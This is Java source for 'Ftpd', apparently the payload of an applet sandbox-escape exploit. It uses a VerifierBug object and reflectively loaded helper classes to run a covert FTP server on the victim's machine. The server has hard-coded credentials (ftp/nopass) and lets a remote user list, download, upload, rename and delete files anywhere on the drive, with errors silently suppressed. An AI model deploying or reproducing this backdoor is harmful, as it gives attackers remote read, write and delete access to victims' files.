import java.lang.*;
import java.lang.reflect.*;
import java.io.*;
import java.net.*;

public class Ftpd extends Thread {

 private Socket sck;
 private String myhost;
 private String host;
 private int port;
 private Class c_fhelper,c_shelper;
 private VerifierBug bug;
 private SocketHelper sh;
 private boolean hasquit=false;
 private boolean haslogged=false;

 private final String fuser="ftp";
 private final String fpass="nopass";

 private static int dport=7000;

 private String dir="/";

 private boolean isWin32=true;
 private String drive="c:";

 public Ftpd(Socket sck,VerifierBug bug,Class c_fhelper,Class c_shelper) {
  try {
   this.sck=sck;
   this.c_fhelper=c_fhelper;
   this.c_shelper=c_shelper;
   this.bug=bug;
   host=sck.getInetAddress().getHostAddress();
   myhost=InetAddress.getLocalHost().getHostAddress();
   sh=new SocketHelper(bug,c_shelper,myhost,host);

   if (!System.getProperty("os.name").toLowerCase().startsWith("windows")) isWin32=false;

  } catch(Throwable e) {}
 }

 InputStream getInputStream(String name) {
  InputStream stream=null;
  try {
   Object o=c_fhelper.newInstance();

   Class aclass[]=new Class[1];
   aclass[0]=Class.forName("java.lang.String");

   Method method=c_fhelper.getMethod("getInput",aclass);

   Object aobj[]=new Object[1];
   aobj[0]=name;

   stream=(InputStream)method.invoke(o,aobj);
  } catch (Throwable e) {}
  return stream;
 }

 OutputStream getOutputStream(String name) {
  OutputStream stream=null;
  try {
   Object o=c_fhelper.newInstance();

   Class aclass[]=new Class[1];
   aclass[0]=Class.forName("java.lang.String");

   Method method=c_fhelper.getMethod("getOutput",aclass);

   Object aobj[]=new Object[1];
   aobj[0]=name;

   stream=(OutputStream)method.invoke(o,aobj);
  } catch (Throwable e) {}
  return stream;
 }

 void deleteFileDir(String name) {
  try {
   Object o=c_fhelper.newInstance();

   Class aclass[]=new Class[1];
   aclass[0]=Class.forName("java.lang.String");

   Method method=c_fhelper.getMethod("delete",aclass);

   Object aobj[]=new Object[1];
   aobj[0]=name;

   method.invoke(o,aobj);
  } catch (Throwable e) {}
 }

 void makeDir(String name) {
  try {
   Object o=c_fhelper.newInstance();

   Class aclass[]=new Class[1];
   aclass[0]=Class.forName("java.lang.String");

   Method method=c_fhelper.getMethod("mkdir",aclass);

   Object aobj[]=new Object[1];
   aobj[0]=name;

   method.invoke(o,aobj);
  } catch (Throwable e) {}
 }

 boolean exists(String name) {
  Boolean b=null;
  try {
   Object o=c_fhelper.newInstance();
   Class aclass[]=new Class[1];
   aclass[0]=Class.forName("java.lang.String");

   Method method=c_fhelper.getMethod("exists",aclass);

   Object aobj[]=new Object[1];
   aobj[0]=name;

   b=(Boolean)method.invoke(o,aobj);
  } catch (Throwable e) {}
  return b.booleanValue();
 }

 void renameFileDir(String from,String to) {
  try {
   Object o=c_fhelper.newInstance();

   Class aclass[]=new Class[2];
   aclass[0]=Class.forName("java.lang.String");
   aclass[1]=Class.forName("java.lang.String");

   Method method=c_fhelper.getMethod("rename",aclass);

   Object aobj[]=new Object[2];
   aobj[0]=from;
   aobj[1]=to;

   method.invoke(o,aobj);
  } catch (Throwable e) {}
 }

 void printFileList(String name,PrintWriter out) {
  try {
   Object o=c_fhelper.newInstance();

   Class aclass[]=new Class[2];
   aclass[0]=Class.forName("java.lang.String");
   aclass[1]=Class.forName("java.io.PrintWriter");

   Method method=c_fhelper.getMethod("list",aclass);

   Object aobj[]=new Object[2];
   aobj[0]=name;
   aobj[1]=out;

   method.invoke(o,aobj);
  } catch (Throwable e) {}
 }

 String absolutePath(String name) {
  String path;
  if (name.indexOf("/")==0) path=name;
   else path=dir+File.separator+name;
  return path;
 }

 String devicePath(String name) {
  String path;
  if (isWin32) {
   path=drive+name;
   path.replace('/',File.separatorChar);
  } else path=name;
  return path;
 }

 String[] getCmdArgs(String line) {
  int i,j;
  String res[]=new String[2];

  for(i=0;i<line.length();i++) {
   if (Character.isWhitespace(line.charAt(i))) break;
  }
  res[0]=line.substring(0,i).trim().toUpperCase();

  for(j=i;j<line.length();j++) {
   if (!Character.isWhitespace(line.charAt(j))) break;
  }
  if (j<line.length()) res[1]=line.substring(j,line.length()).trim();

  return res;
 }

 public void run() {
  try {
   String line,cmd,arg,user,pass,rname;
   String argtab[];
   ServerSocket srv=null;
   Socket dsck=null;
   boolean passive=false;
   BufferedReader in=new BufferedReader(new InputStreamReader(sck.getInputStream()));
   PrintWriter out=new PrintWriter(sck.getOutputStream(),true);

   out.println("220 LSD Simple FTP server ver. 1.0\r");
   out.flush();

   user=pass=rname=null;
   
   while(!hasquit) { 
    
    line=in.readLine();
    if (line==null) continue;

    argtab=getCmdArgs(line);
    cmd=argtab[0];
    arg=argtab[1];

    if (cmd.startsWith("USER")) {
     user=arg;
     out.println("331 Password");
    } else 

    if (cmd.startsWith("PASS")) {
     pass=arg;
     if ((pass!=null)&&user.equals(fuser)&&pass.equals(fpass)) { 
      out.println("230 User "+user+" logged in.");
      haslogged=true;
     } else {
      out.println("530 Login incorrect.");
     }
    } else 

    if (cmd.startsWith("QUIT")) {
     out.println("221 Goodbye");
     hasquit=true;
    }

    if (haslogged) {
     if (cmd.startsWith("SYST")) out.println("215 UNIX Type: L8");
      else

     if (cmd.startsWith("PWD")) out.println("257 \""+dir+"\" is current directory");
      else

     if (cmd.startsWith("TYPE")) out.println("200 type set to "+arg);
      else

     if (cmd.startsWith("NOOP")) out.println("200 command successfull");
      else

     if (cmd.startsWith("SITE")) {
      out.println("501 SITE option not supported");
     } else

     if (cmd.startsWith("REST")) {
      out.println("350 Restarting at 0. Send STORE or RETRIEVE to iniitiate transfer");
     } else

     if (cmd.startsWith("MDTM")||cmd.startsWith("OPTS")||cmd.startsWith("SIZE")) {
      out.println("500 command not understood");
     } else

     if (cmd.startsWith("PASV")) {
      do {
       dport++;
       srv=sh.socketCreate(dport);
      } while(srv==null);
      passive=true;
      out.println("227 Entering passive mode ("+myhost.replace('.',',')+","+(dport>>8)+","+(dport&0xff)+")");
     } else

     if (cmd.startsWith("PORT")) {
      int i;
      String l,h;
      i=line.lastIndexOf(",");
      h=line.substring(line.lastIndexOf(",",i-1)+1,i);
      l=line.substring(i+1,line.length());
      port=Integer.parseInt(h)*256+Integer.parseInt(l);
      out.println("200 PORT command successful"); 
     } else

     if (cmd.startsWith("LIST")) {
      Socket s=null;
      int i;
      if (!passive) {
       s=sh.socketConnect(host,port);
      } else {
       s=sh.socketAccept(srv);
      }
      PrintWriter cout=new PrintWriter(s.getOutputStream(),true);
      out.println("150 ASCII data");      
      printFileList(devicePath(dir),cout);
      s.close();
      out.println("226 transfer complete");
     } else

     if (cmd.startsWith("NLST")) {
      String cdir=null;
      Socket s=null;
      int i;
      if (arg!=null) {
       cdir=absolutePath(arg);
      } else cdir=dir;
      cdir=devicePath(cdir);

      if (exists(cdir)) {
       if (!passive) {
        s=sh.socketConnect(host,port);
       } else {
        s=sh.socketAccept(srv);
       }
       PrintWriter cout=new PrintWriter(s.getOutputStream(),true);
       out.println("150 ASCII data"); 
       printFileList(cdir,cout);
       s.close();
       out.println("226 transfer complete");
      } else out.println("550 '"+arg+"'no such file or directory");
     } else

     if (cmd.startsWith("CWD")) {
      String cdir=null;
      if (arg!=null) {
       cdir=absolutePath(arg);
      } else cdir=dir;

      if (exists(devicePath(cdir))) {
       dir=cdir;
       out.println("250 CWD command succesful");
      } else out.println("550 '"+arg+"'no such file or directory");
     } else

     if (cmd.startsWith("CDUP")) {
      int n=dir.lastIndexOf(File.separator);
      if (n>0) dir=dir.substring(0,n);
      out.println("250 CWD command succesful");
     } else

     if (cmd.startsWith("RETR")) {
      byte buf[]=new byte[1024];
      Socket s=null;
      int i;
      if (arg!=null) {
       InputStream file=getInputStream(devicePath(absolutePath(arg)));
       if (!passive) {
        s=sh.socketConnect(host,port);
       } else {
        s=sh.socketAccept(srv);
       }
       OutputStream cout=s.getOutputStream();
       if ((file!=null)&&(cout!=null)) {
        out.println("150 Binary data connection");
        try {
         while((i=file.read(buf))!= -1) {
          cout.write(buf,0,i);
         }
         cout.close();
         s.close();
         file.close();
         out.println("226 transfer complete");
        } catch (Throwable e) {out.println("226 transfer complete");}
       } else out.println("550 '"+arg+"'no such file or directory");
      } else out.println("550 '"+arg+"'no such file or directory");
     } else

     if (cmd.startsWith("STOR")) {
      byte buf[]=new byte[1024];
      Socket s=null;
      int i;
      if (arg!=null) {
       OutputStream file=getOutputStream(devicePath(absolutePath(arg)));
       if (!passive) {
        s=sh.socketConnect(host,port); 
       } else {
        s=sh.socketAccept(srv);
       }
       InputStream cout=s.getInputStream();
       if ((file!=null)&&(cout!=null)) {
        out.println("150 Binary data connection");
        try {
         while((i=cout.read(buf))!= -1) {
          file.write(buf,0,i);
         }
         cout.close();
         s.close();
         file.close();
         out.println("226 transfer complete");
        } catch (Throwable e) {out.println("226 transfer complete");}

       } else out.println("550 '"+arg+"'no such file or directory");
      } else out.println("550 '"+arg+"'no such file or directory");      
     } else

     if (cmd.startsWith("DELE")) {
      if (arg!=null) { 
       deleteFileDir(devicePath(absolutePath(arg)));
       out.println("250 DELE command successful");
      } else out.println("550 '"+arg+"'no such file or directory");
     } else

     if (cmd.startsWith("RMD")) {
      if (arg!=null) { 
       deleteFileDir(devicePath(absolutePath(arg)));
       out.println("250 RND command successful");
      } else out.println("550 '"+arg+"'no such file or directory");
     } else

     if (cmd.startsWith("MKD")) {
      if (arg!=null) { 
       makeDir(devicePath(absolutePath(arg)));
       out.println("250 MKD command successful");
      } else out.println("550 '"+arg+"'no such file or directory");
     } else

     if (cmd.startsWith("RNFR")) {
      if (arg!=null) { 
       rname=arg;
       out.println("350 RNFR command successful");
      } else out.println("550 '"+arg+"'no such file or directory");
     } else

     if (cmd.startsWith("RNTO")) {
      if (arg!=null) { 
       renameFileDir(devicePath(absolutePath(rname)),devicePath(absolutePath(arg)));
       out.println("250 RNTO command successful");
      } else out.println("550 '"+arg+"'no such file or directory");
     }

    }
    out.flush();

   }

   sck.close();
   } catch (Throwable e) {}
 } 

}
